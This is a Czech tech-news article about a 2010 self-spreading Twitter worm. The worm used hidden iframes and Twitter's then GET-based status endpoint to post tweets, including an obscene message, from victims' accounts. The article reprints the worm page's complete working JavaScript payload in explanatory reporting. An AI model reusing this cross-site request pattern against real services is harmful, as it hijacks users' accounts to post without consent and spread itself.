reklama

Další exploit: kozy zaútočily na Twitter

Pár dní po prvním „útoku“ na Twitter zažila oblíbená sociální síť další. Tentokrát nebyl tak sofistikovaný a spíše než potenciální chyby v samotném Twitteru využíval prostých vlastností jazyka HTML a DOM API.

Možná jste si všimli, že vaši přátelé znenadání začali psát zprávičky s tímto obsahem:

„I love anal sex with goats“

Pro neznalé angličtiny:

„Mám rád anální sex s kozami“

Ještě předtím se ovšem na jejich profilu objevil tento tweet:

„WTF: http://t.co/smbuvNd

Každý, kdo na takový odkaz klepnul, se přesunul na zdánlivě prázdnou stránku, ve skutečnosti se na ní ale zpracoval Javascript. Ten vytvořil neviditelný prvek IFRAME (vložená cizí stránka uvnitř další stránky) a v tomto rámci načetl adresu http://twitter.com/share/update?status=. Jakýkoliv text za rovnítkem se pak pomocí HTTP GET metody poslal přímo na Twitter jako zcela běžná zprávička.

Klepněte pro větší obrázek
A takto se choval twitterový červ v praxi

Kód celkem vytvořil dva prvky IFRAME. V tom prvním se nejprve odeslal odkaz s „WTF“, abyste nalákali další potenciální oběti, v tom druhém pak informace o vaší sexuální preferenci.

Celý kód, který se zpracoval na záškodnické stránce:

<html>
<head></head>
<body>
<script>
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "
http://twitter.com/share/update?status=WTF: " + window.location;
el2.src = "
http://twitter.com/share/update?status=I love anal sex with goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);
</script>
</body>
</html>

Tento případ nezneužíval nějaké podstatnější chyby v Twitteru – pouze té vlastnosti, že Twitter uměl poslat zprávičku i přes HTTP GET požadavek. Jak se zdá, nyní to už není možné, pokud totiž GET požadavek upravíte a v prohlížeči navštívíte celou adresu, Twitter ohlásí neexistujícího uživatele share. Ani tentokrát nezpůsobil „virus“ nic vážného, pouze na pár jedinců (netušíme kolik) prozradil, co neměl.

Témata článku: Technologie, Web, Sociální sítě, Bezpečnost, Twitter, Status, Hidden, Love, Head

11 komentářů

Nejnovější komentáře

  • Feodaron 27. 9. 2010 19:10:01
    Ony přístup nemají, ani ho nepotřebují. Jedná se tady pouze o zaslání...
  • Juggernaut 27. 9. 2010 16:08:18
    Omlouvám se za nedovtipnost, ale mohl by mi někdo vysvětlit, proč tenhle...
  • Radim Lipovčan 27. 9. 2010 8:47:50
    Zajímavý expolit, tak alespoň někteří se o sobě a jiných dozvěděli další...
reklama
Určitě si přečtěte

Facebook o nás ví vše. Díky dobře skrytému vyhledávači se to dozví i ostatní

Facebook o nás ví vše. Díky dobře skrytému vyhledávači se to dozví i ostatní

** Facebook o nás ví vše, protože mu to sami řekneme ** V jeho nitru se skrývá mocný vyhledávač ** Mohou jej zneužít stalkeři, sociální inženýři a další nezbedníci

16.  2.  2017 | Jakub Čížek | 76

Pojďme programovat elektroniku: Žádný bastlíř se neobejde bez armády švábů

Pojďme programovat elektroniku: Žádný bastlíř se neobejde bez armády švábů

** Každý bastlíř se po čase neobjede bez armády švábů ** Dnes si některé z nich vyzkoušíme ** Třeba zázračný posuvný registr

19.  2.  2017 | Jakub Čížek | 36

K čemu jsou v zimě dobré chytré hodinky? Z lyžování vám udělají datové orgie

K čemu jsou v zimě dobré chytré hodinky? Z lyžování vám udělají datové orgie

** Chytré hodinky našly uplatnění především ve sportu ** Běhání či jízdu na kole zvládnou všechny, ale co třeba lyžování? ** Podívejte se, jak jsou na zimní sporty připraveny hodinky Garmin Fenix 3

15.  2.  2017 | David Polesný | 22


Aktuální číslo časopisu Computer

Stavba 3D tiskárny

Výbava domácí elektrodílničky

Budoucnost 5G sítí

Velké testy microSD karet a vodních chladičů

Přehled mobilních tarifů

reklama
reklama